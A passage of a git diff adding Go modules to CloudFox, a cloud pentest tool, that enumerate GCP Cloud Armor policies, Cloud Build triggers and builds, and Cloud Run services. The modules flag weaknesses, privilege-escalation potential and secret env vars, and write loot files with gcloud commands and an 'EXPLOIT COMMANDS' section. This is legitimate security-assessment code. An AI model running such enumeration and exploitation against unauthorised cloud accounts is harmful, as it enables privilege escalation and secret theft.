m.getCertificatesHeader(), + Body: m.certsToTableBody(allCerts, allSSLCerts), + }) + } + + if len(allCertMaps) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificate-maps", + Header: m.getCertMapsHeader(), + Body: m.certMapsToTableBody(allCertMaps), + }) + } + + output := CertManagerOutput{Table: tables} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go new file mode 100644 index 00000000..a722bde7 --- /dev/null +++ b/gcp/commands/cloudarmor.go @@ -0,0 +1,371 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudArmorCommand = &cobra.Command{ + Use: globals.GCP_CLOUDARMOR_MODULE_NAME, + Aliases: []string{"armor", "waf", "security-policies"}, + Short: "Enumerate Cloud Armor security policies and find weaknesses", + Long: `Enumerate Cloud Armor security policies and identify misconfigurations. + +Cloud Armor provides DDoS protection and WAF (Web Application Firewall) capabilities +for Google Cloud load balancers. + +Security Relevance: +- Misconfigured policies may not actually block attacks +- Preview-only rules don't block, just log +- Missing OWASP rules leave apps vulnerable to common attacks +- Unprotected load balancers have no WAF protection + +What this module finds: +- All Cloud Armor security policies +- Policy weaknesses and misconfigurations +- Rules in preview mode (not blocking) +- Load balancers without Cloud Armor protection +- Missing adaptive protection (DDoS)`, + Run: runGCPCloudArmorCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudArmorModule struct { + gcpinternal.BaseGCPModule + + ProjectPolicies map[string][]cloudarmorservice.SecurityPolicy // projectID -> policies + UnprotectedLBs map[string][]string // projectID -> LB names + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudArmorOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudArmorOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudArmorOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudArmorCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDARMOR_MODULE_NAME) + if err != nil { + return + } + + module := &CloudArmorModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPolicies: make(map[string][]cloudarmorservice.SecurityPolicy), + UnprotectedLBs: make(map[string][]string), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudArmorModule) getAllPolicies() []cloudarmorservice.SecurityPolicy { + var all []cloudarmorservice.SecurityPolicy + for _, policies := range m.ProjectPolicies { + all = append(all, policies...) + } + return all +} + +func (m *CloudArmorModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDARMOR_MODULE_NAME, m.processProject) + + // Count unprotected LBs + totalUnprotected := 0 + for _, lbs := range m.UnprotectedLBs { + totalUnprotected += len(lbs) + } + + allPolicies := m.getAllPolicies() + if len(allPolicies) == 0 && totalUnprotected == 0 { + logger.InfoM("No Cloud Armor policies found", globals.GCP_CLOUDARMOR_MODULE_NAME) + return + } + + // Count policies with weaknesses + weakPolicies := 0 + for _, policy := range allPolicies { + if len(policy.Weaknesses) > 0 { + weakPolicies++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d security policy(ies), %d with weaknesses, %d unprotected LB(s)", + len(allPolicies), weakPolicies, totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + + if totalUnprotected > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d load balancer(s) have no Cloud Armor protection", totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking Cloud Armor in project: %s", projectID), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + svc := cloudarmorservice.New() + + // Get security policies + policies, err := svc.GetSecurityPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Armor security policies in project %s", projectID)) + } + + // Get unprotected LBs + unprotectedLBs, err := svc.GetUnprotectedLoadBalancers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate unprotected load balancers in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectPolicies[projectID] = policies + if len(unprotectedLBs) > 0 { + m.UnprotectedLBs[projectID] = unprotectedLBs + } + m.mu.Unlock() +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CloudArmorModule) getPoliciesHeader() []string { + return []string{"Project", "Policy", "Type", "Rules", "Adaptive", "DDoS", "Attached To", "Weaknesses"} +} + +func (m *CloudArmorModule) getRulesHeader() []string { + return []string{"Project", "Policy", "Priority", "Action", "Preview", "Match", "Rate Limit"} +} + +func (m *CloudArmorModule) getUnprotectedLBsHeader() []string { + return []string{"Project", "Backend Service", "Status"} +} + +func (m *CloudArmorModule) policiesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { + var body [][]string + for _, policy := range policies { + adaptive := "No" + if policy.AdaptiveProtection { + adaptive = "Yes" + } + + ddos := "-" + if policy.DDOSProtection != "" { + ddos = policy.DDOSProtection + } + + resources := "-" + if len(policy.AttachedResources) > 0 { + resources = strings.Join(policy.AttachedResources, ", ") + } + + weaknesses := "-" + if len(policy.Weaknesses) > 0 { + weaknesses = strings.Join(policy.Weaknesses, "; ") + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.Name, + policy.Type, + fmt.Sprintf("%d", policy.RuleCount), + adaptive, + ddos, + resources, + weaknesses, + }) + } + return body +} + +func (m *CloudArmorModule) rulesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { + var body [][]string + for _, policy := range policies { + for _, rule := range policy.Rules { + preview := "No" + if rule.Preview { + preview = "Yes" + } + + rateLimit := "-" + if rule.RateLimitConfig != nil { + rateLimit = fmt.Sprintf("%d/%ds", rule.RateLimitConfig.ThresholdCount, rule.RateLimitConfig.IntervalSec) + } + + match := rule.Match + if len(match) > 80 { + match = match[:77] + "..." + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.Name, + fmt.Sprintf("%d", rule.Priority), + rule.Action, + preview, + match, + rateLimit, + }) + } + } + return body +} + +func (m *CloudArmorModule) unprotectedLBsToTableBody(projectID string, lbs []string) [][]string { + var body [][]string + for _, lb := range lbs { + body = append(body, []string{ + m.GetProjectName(projectID), + lb, + "UNPROTECTED", + }) + } + return body +} + +func (m *CloudArmorModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if policies, ok := m.ProjectPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "security-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(policies), + }) + + // Add rules table if there are rules + rulesBody := m.rulesToTableBody(policies) + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "security-policy-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } + } + + if lbs, ok := m.UnprotectedLBs[projectID]; ok && len(lbs) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "unprotected-backend-services", + Header: m.getUnprotectedLBsHeader(), + Body: m.unprotectedLBsToTableBody(projectID, lbs), + }) + } + + return tableFiles +} + +func (m *CloudArmorModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectPolicies { + projectIDs[projectID] = true + } + for projectID := range m.UnprotectedLBs { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + outputData.ProjectLevelData[projectID] = CloudArmorOutput{Table: tableFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) + } +} + +func (m *CloudArmorModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allPolicies := m.getAllPolicies() + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(allPolicies), + }) + } + + // Add rules table if there are rules + if len(allPolicies) > 0 { + rulesBody := m.rulesToTableBody(allPolicies) + if len(rulesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-policy-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } + } + + // Build unprotected LBs table from all projects + var allUnprotectedBody [][]string + for projectID, lbs := range m.UnprotectedLBs { + allUnprotectedBody = append(allUnprotectedBody, m.unprotectedLBsToTableBody(projectID, lbs)...) + } + if len(allUnprotectedBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "unprotected-backend-services", + Header: m.getUnprotectedLBsHeader(), + Body: allUnprotectedBody, + }) + } + + output := CloudArmorOutput{Table: tables} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) + } +} diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go new file mode 100644 index 00000000..02ba4d49 --- /dev/null +++ b/gcp/commands/cloudbuild.go @@ -0,0 +1,523 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudBuildCommand = &cobra.Command{ + Use: globals.GCP_CLOUDBUILD_MODULE_NAME, + Aliases: []string{"cb", "build", "builds"}, + Short: "Enumerate Cloud Build triggers and builds", + Long: `Enumerate Cloud Build triggers and recent build executions. + +Features: +- Lists all build triggers +- Shows trigger source configuration (GitHub, CSR) +- Identifies service accounts used for builds +- Shows recent build executions +- Detects potentially risky trigger configurations`, + Run: runGCPCloudBuildCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type CloudBuildModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ProjectTriggers map[string][]cloudbuildservice.TriggerInfo // projectID -> triggers + ProjectBuilds map[string][]cloudbuildservice.BuildInfo // projectID -> builds + ProjectSecurityAnalysis map[string][]cloudbuildservice.TriggerSecurityAnalysis // projectID -> analysis + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper attack path analysis results + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type CloudBuildOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudBuildOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudBuildOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDBUILD_MODULE_NAME) + if err != nil { + return + } + + module := &CloudBuildModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTriggers: make(map[string][]cloudbuildservice.TriggerInfo), + ProjectBuilds: make(map[string][]cloudbuildservice.BuildInfo), + ProjectSecurityAnalysis: make(map[string][]cloudbuildservice.TriggerSecurityAnalysis), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject) + + allTriggers := m.getAllTriggers() + allBuilds := m.getAllBuilds() + + if len(allTriggers) == 0 && len(allBuilds) == 0 { + logger.InfoM("No Cloud Build triggers or builds found", globals.GCP_CLOUDBUILD_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d trigger(s), %d recent build(s)", + len(allTriggers), len(allBuilds)), globals.GCP_CLOUDBUILD_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *CloudBuildModule) getAllTriggers() []cloudbuildservice.TriggerInfo { + var all []cloudbuildservice.TriggerInfo + for _, triggers := range m.ProjectTriggers { + all = append(all, triggers...) + } + return all +} + +func (m *CloudBuildModule) getAllBuilds() []cloudbuildservice.BuildInfo { + var all []cloudbuildservice.BuildInfo + for _, builds := range m.ProjectBuilds { + all = append(all, builds...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Build in project: %s", projectID), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + cbSvc := cloudbuildservice.New() + + // Get triggers + triggers, err := cbSvc.ListTriggers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build triggers in project %s", projectID)) + } + + // Get recent builds + builds, err := cbSvc.ListBuilds(projectID, 20) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build builds in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectTriggers[projectID] = triggers + m.ProjectBuilds[projectID] = builds + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudbuild-details"] = &internal.LootFile{ + Name: "cloudbuild-details", + Contents: "# Cloud Build Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + var projectAnalysis []cloudbuildservice.TriggerSecurityAnalysis + for _, trigger := range triggers { + m.addTriggerToLoot(projectID, trigger) + // Perform security analysis + analysis := cbSvc.AnalyzeTriggerForPrivesc(trigger, projectID) + projectAnalysis = append(projectAnalysis, analysis) + m.addSecurityAnalysisToLoot(projectID, analysis) + } + m.ProjectSecurityAnalysis[projectID] = projectAnalysis + + // Add build step analysis to loot + for _, build := range builds { + m.addBuildToLoot(projectID, build) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudBuildModule) addTriggerToLoot(projectID string, trigger cloudbuildservice.TriggerInfo) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + + // Build flags for special attributes + var flags []string + if trigger.PrivescPotential { + flags = append(flags, "PRIVESC POTENTIAL") + } + if trigger.Disabled { + flags = append(flags, "DISABLED") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" + } + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUILD TRIGGER: %s%s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# ID: %s\n"+ + "# Source: %s - %s\n"+ + "# Branch/Tag: %s, Config: %s\n"+ + "# Service Account: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe trigger:\n"+ + "gcloud builds triggers describe %s --project=%s\n", + trigger.Name, flagStr, + trigger.ProjectID, + trigger.ID, + trigger.SourceType, trigger.RepoName, + branchTag, trigger.Filename, + sa, + trigger.ID, trigger.ProjectID, + ) +} + +func (m *CloudBuildModule) addSecurityAnalysisToLoot(projectID string, analysis cloudbuildservice.TriggerSecurityAnalysis) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + + // Add exploitation commands if available + if len(analysis.ExploitCommands) > 0 { + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + for _, cmd := range analysis.ExploitCommands { + lootFile.Contents += fmt.Sprintf("# %s\n", cmd) + } + } + lootFile.Contents += "\n" +} + +func (m *CloudBuildModule) addBuildToLoot(projectID string, build cloudbuildservice.BuildInfo) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# BUILD: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Status: %s\n"+ + "# Trigger: %s, Source: %s\n", + buildID, + build.ProjectID, build.Status, + build.TriggerID, build.Source, + ) + + // Log location + if build.LogsBucket != "" { + lootFile.Contents += fmt.Sprintf( + "Logs: gsutil cat %s/log-%s.txt\n", + build.LogsBucket, build.ID, + ) + } + + // Secret environment variables + if len(build.SecretEnvVars) > 0 { + lootFile.Contents += "Secret Env Vars:\n" + for _, secret := range build.SecretEnvVars { + lootFile.Contents += fmt.Sprintf(" - %s\n", secret) + } + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Log privesc count + privescCount := 0 + for _, triggers := range m.ProjectTriggers { + for _, trigger := range triggers { + if trigger.PrivescPotential { + privescCount++ + } + } + } + if privescCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CloudBuildModule) getTriggersHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Source", + "Repository", + "Branch/Tag", + "Config File", + "Service Account", + "SA Attack Paths", + "Disabled", + "Privesc Potential", + } +} + +func (m *CloudBuildModule) getBuildsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "ID", + "Status", + "Trigger", + "Source", + "Created", + } +} + +func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.TriggerInfo) [][]string { + var body [][]string + for _, trigger := range triggers { + disabled := "No" + if trigger.Disabled { + disabled = "Yes" + } + + privescPotential := "No" + if trigger.PrivescPotential { + privescPotential = "Yes" + } + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName + } + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + body = append(body, []string{ + m.GetProjectName(trigger.ProjectID), + trigger.ProjectID, + trigger.Name, + trigger.SourceType, + trigger.RepoName, + branchTag, + trigger.Filename, + sa, + attackPaths, + disabled, + privescPotential, + }) + } + return body +} + +func (m *CloudBuildModule) buildsToTableBody(builds []cloudbuildservice.BuildInfo) [][]string { + var body [][]string + for _, build := range builds { + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } + body = append(body, []string{ + m.GetProjectName(build.ProjectID), + build.ProjectID, + buildID, + build.Status, + build.TriggerID, + build.Source, + build.CreateTime, + }) + } + return body +} + +func (m *CloudBuildModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if triggers, ok := m.ProjectTriggers[projectID]; ok && len(triggers) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudbuild-triggers", + Header: m.getTriggersHeader(), + Body: m.triggersToTableBody(triggers), + }) + } + + if builds, ok := m.ProjectBuilds[projectID]; ok && len(builds) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudbuild-builds", + Header: m.getBuildsHeader(), + Body: m.buildsToTableBody(builds), + }) + } + + return tableFiles +} + +func (m *CloudBuildModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectTriggers { + projectIDs[projectID] = true + } + for projectID := range m.ProjectBuilds { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudBuildOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + } +} + +func (m *CloudBuildModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allTriggers := m.getAllTriggers() + allBuilds := m.getAllBuilds() + + var tables []internal.TableFile + + if len(allTriggers) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-triggers", + Header: m.getTriggersHeader(), + Body: m.triggersToTableBody(allTriggers), + }) + } + + if len(allBuilds) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-builds", + Header: m.getBuildsHeader(), + Body: m.buildsToTableBody(allBuilds), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := CloudBuildOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go new file mode 100644 index 00000000..2bca99ee --- /dev/null +++ b/gcp/commands/cloudrun.go @@ -0,0 +1,688 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudRunCommand = &cobra.Command{ + Use: globals.GCP_CLOUDRUN_MODULE_NAME, + Aliases: []string{"run", "cr"}, + Short: "Enumerate Cloud Run services and jobs with security analysis", + Long: `Enumerate Cloud Run services and jobs across projects with security-relevant details. + +Features: +- Lists all Cloud Run services and jobs +- Shows security configuration (ingress, VPC, service account) +- Identifies publicly invokable services (allUsers/allAuthenticatedUsers) +- Shows container image, resources, and scaling configuration +- Counts environment variables and secret references +- Generates gcloud commands for further analysis + +Security Columns: +- Ingress: INGRESS_TRAFFIC_ALL (public), INTERNAL_ONLY, or INTERNAL_LOAD_BALANCER +- Public: Whether allUsers or allAuthenticatedUsers can invoke the service +- Service Account: The identity the service runs as +- SA Attack Paths: Privesc/exfil/lateral movement potential (run foxmapper first) +- VPC Access: Network connectivity to VPC resources +- Env Vars: Count of plain environment variables +- Secret Mgr: Count of env vars referencing Secret Manager (secure storage) +- Hardcoded: Detected secrets in env var VALUES (API keys, passwords, tokens) + +Attack Surface: +- Public services with ALL ingress are internet-accessible +- Services with default service account may have excessive permissions +- VPC-connected services can access internal resources +- Container images may contain vulnerabilities or secrets +- Hardcoded secrets in env vars are a critical security risk + +TIP: Run foxmapper first to populate the SA Attack Paths column.`, + Run: runGCPCloudRunCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudRunModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectServices map[string][]CloudRunService.ServiceInfo // projectID -> services + ProjectJobs map[string][]CloudRunService.JobInfo // projectID -> jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudRunOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudRunOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudRunOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDRUN_MODULE_NAME) + if err != nil { + return + } + + module := &CloudRunModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectServices: make(map[string][]CloudRunService.ServiceInfo), + ProjectJobs: make(map[string][]CloudRunService.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_CLOUDRUN_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) + + // Get all resources for stats + allServices := m.getAllServices() + allJobs := m.getAllJobs() + totalResources := len(allServices) + len(allJobs) + if totalResources == 0 { + logger.InfoM("No Cloud Run services or jobs found", globals.GCP_CLOUDRUN_MODULE_NAME) + return + } + + // Count public services + publicCount := 0 + for _, svc := range allServices { + if svc.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s), %d public", len(allServices), len(allJobs), publicCount), globals.GCP_CLOUDRUN_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s)", len(allServices), len(allJobs)), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllServices returns all services from all projects (for statistics) +func (m *CloudRunModule) getAllServices() []CloudRunService.ServiceInfo { + var all []CloudRunService.ServiceInfo + for _, services := range m.ProjectServices { + all = append(all, services...) + } + return all +} + +// getAllJobs returns all jobs from all projects (for statistics) +func (m *CloudRunModule) getAllJobs() []CloudRunService.JobInfo { + var all []CloudRunService.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudRunModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + 